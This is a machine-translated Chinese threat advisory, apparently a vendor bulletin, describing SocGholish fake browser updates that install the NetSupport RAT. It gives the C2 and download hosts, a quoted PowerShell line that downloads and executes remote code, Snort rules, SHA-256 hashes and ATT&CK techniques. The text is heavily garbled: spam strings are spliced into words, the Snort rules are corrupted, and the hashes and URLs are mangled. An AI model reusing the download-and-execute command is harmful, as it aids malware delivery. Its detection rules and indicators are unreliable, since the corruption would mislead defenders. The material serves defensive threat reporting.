安全安全威胁警报

通过S必威体育官网appocgholish威胁演员通过假浏览器更新提供的NetSupport Remote Access Trojan(Rat)

涉嫌与被称为“邪恶公司”的俄罗斯威胁行为者有关。众所周知,威胁参与者将将HTML代码放入过时或脆弱的网站中。当用户访问折衷的网站时,代码会在浏览器中生成一个弹出窗口,试图欺骗用户相信其浏览器已过时。如果诱使用户相信其浏览器已过时,请单击“更新”链接会导致下载包含恶意JavaScript的存档文件。执行JavaScript后,将下载其他恶意软件并安装在用户的计算机上。

感染链

折衷的地点[已编辑]- 开车
casting.faeryfox [。] com- SocGholish指挥与控制(C2)
aeoi [。] pl/21.ico- Ne必威体育官网apptSupport Rat下载网站
94.158.247 [。] 32/facheurl.htm- Ne必威体育官网apptSupport Rat C2

该图像是显示感染过程中观察到的PCAP流量的屏幕截图。
如上所示:感染期间观察到的PCAP流量。

初始访问(开车)

当用户浏览托管注入的HTML代码的折衷的站点时,获得了初始访问。

屏幕截图显示了注入折磨的站点的混淆的HTML代码,将访问者重定向到Fake-Browser Update Page。
如上所示:混淆的HTML代码注入了折衷的网站,将访问者重定向到假浏览器更新页面
屏幕截图显示一个假浏览器更新页面吸引用户下载包含恶意JavaScript的存档文件。
如上所示:假浏览器更新页面吸引用户下载包含恶意JavaScript的存档文件

执行

当用户被欺骗到下载的存档文件中下载和执行JavaScript时,获得了执行阶段。使用Windows WScript进程执行JavaScript。JavaScript包含混淆的代码,该代码调用Windows PowerShell进程以与下载站点连接并执行附加的PowerShell脚本。

父进程:C:\ Windows \ System32 \ wscript.exe
儿童过程:C:\ Windows \ System32 \ Windowspowershell \ V1.0 \ PowerShell.exe
命令行:“ C:\ Windows \ System32 \ WindowsPowersHell \ V1.0 \ powershell.exe” -w h -c“ iwr -usebasicparsing http://aeoi.pl/21.ico | iex”

PowerShell模块日志:CommandInvocation(Indoke-Webrequest):“ Indoke-webrequest”参数binding(Invoke-webrequest):n​​ame =“ usebasicparsing”;value =“ true” parameterbinding(Indoke-webrequest):n​​ame =“ uri”;value =“ http://aeoi.pl/21.ico” CommandInvocation(Indoke-Expression):“ Indoke-Expression”

屏幕截图显示了在下载网站上托管的受感染主机和PowerShell脚本的PowerShell用户代理
如上所示:来自受感染主机的PowerShell用户代理和下载网站上托管的PowerShell脚本
屏幕快照显示用于安装和重命名NetSupport Rat客户端的部分PowerShell脚本。必威体育官网app
如上所示:用于安装和重命名NetSupport Rat客户端的部分Powershell脚本必威体育官网app
此屏幕截图显示文件下载并安装了与NetSupport Rat相关联。必威体育官网app
如上所示:文件下载并安装了与NetSupport Rat关联的文件必威体育官网app
屏幕快照显示安装后显示的代码,试图识别用户的地理位置必威体育官网app
如上所示:安装后NetSupport尝试识别用户的地理必威体育官网app位置
屏幕截图显示NetSupport客户端元数据显必威体育官网app示重命名后的原始名称
如上所示:Net必威体育官网appSupport客户端元数据重命名后显示原始名称

持久性

持久性是通过下载网站上托管的PowerShell脚本获得的。该脚本创建了一个注册表密钥以在启动时运行。

屏幕截图显示为启动重命名的NetSupport client whost.exe创建的注册表密钥必威体育官网app
如上所示:创建的注册表密钥是为了启动重命名的netSupport client whost.必威体育官网appexe

命令与控制

屏幕截图显示从感染主机到NetSupport Rat的C2网络通信必威体育官网app
如上所示:C2网络通信从受感染的主机到NetSupport Rat必威体育官网app

Opentext自定义内容以识别NetSupport Rat行为必威体育官网app

Sigma规则

屏幕截图显示用于检测与NetSupport Rat相关的过程行为的Sigma规则必威体育官网app
如上所示:Sigma规则用于检测与NetSupport Rat相关的过程行为必威体育官网app
屏幕截图显示了用于检测与NetSupport Rat关联的Powershell模块脚本行为的Sigma规则。必威体育官网app
如上所示:Sigma规则用于检测与NetSupport Rat关联的PowerShell模块脚本行为必威体育官网app

Snort规则

警报tcp $ home_net任何 - > $> $ external_net $ http_ports(msg:“ opentext - Windows PowerShell用户代理”; Flow:建立,to_server; content; content; content;”;http_header;ClasStype:不舒服;SID:20228161;修订:1;)

警报tcp $ home_net任何 - > $> $ external_net $ http_ports(msg:“ opentext - 必威体育官网appnetsupport geoLocation查找”; flow:建立,to_server; content; content; tos | 3a 20 | geo.netsupportsoft.com:“获取”; http_method;内容:“/location/loca.asp”; http_uri; sid:20228162; rev:1;)

警报TCP $ HOME_NET任何 - > $> $ external_net 443(msg:“ opentext - n必威体育官网appetsupport rat post request”; flow:建立,to_server; content; contest; post; content; content; content; content |'user -agent | 3a 20 | netsupport manager/; nocase; nocase/; nocase; nocase; nocase; nocase; nocase; nocase; nocase; nocase; nocase; nocase; nocase; nocase》; sid:20228163; rev:1;)

妥协的指标

SHA-256 HASH:520B8A64A11FDFB63D584E11EC1355CBA6943CF102501FE4670C6429CDC13A61- comhrome.updаte.zip
https://www.virustotal.com/gui/file/520b8a64a11fdfb63d584e11ec1355555555555CF102501FE4670C6429CDC13A61/details

SHA-256哈希:1455C4250FEA9A6A589EA23A60E130AB3F414A510D63CBF4EAF5693012D6272D- autoupdater.jshttps://www.virustotal.com/gui/file/1455c4250fea9a6a6a589ea23a60e130ab3f414a510d63cbf4af563cbf4ef5693012d6272d/details

SHA-256哈希:B6B51F4273420C24EA7DC13EF4CC7615262CCBDF6F5E5A49DAE6DAE604EC1530555ADAD- 客户端32.EXE
https://www.virustotal.com/gui/file/B6B51F4273420C24EA7DC13EF4CC7615262CCBDF6F5E5A49DAE6DAE6044EC15305555AD/Details

观察到的斜切ATT&CK技术

T1189驱动器妥协
T1059.007 JavaScript
T1059.001 Powershell
T1547.001注册表运行键 /启动文件夹
T1140 DEOBFUSCATE/DECODE文件或信息
T1219远程访问软件

维护系统保护

OpentextTM值安全服务团队利用他们的丰富经验来确定组织的安全风险,并与他们合作以保持系统保护,并提供多种服务来解决网络安全和隐私目标。联系我们了解更多信息。

作者:首席顾问Lenny Conway

相关文章

返回顶部按钮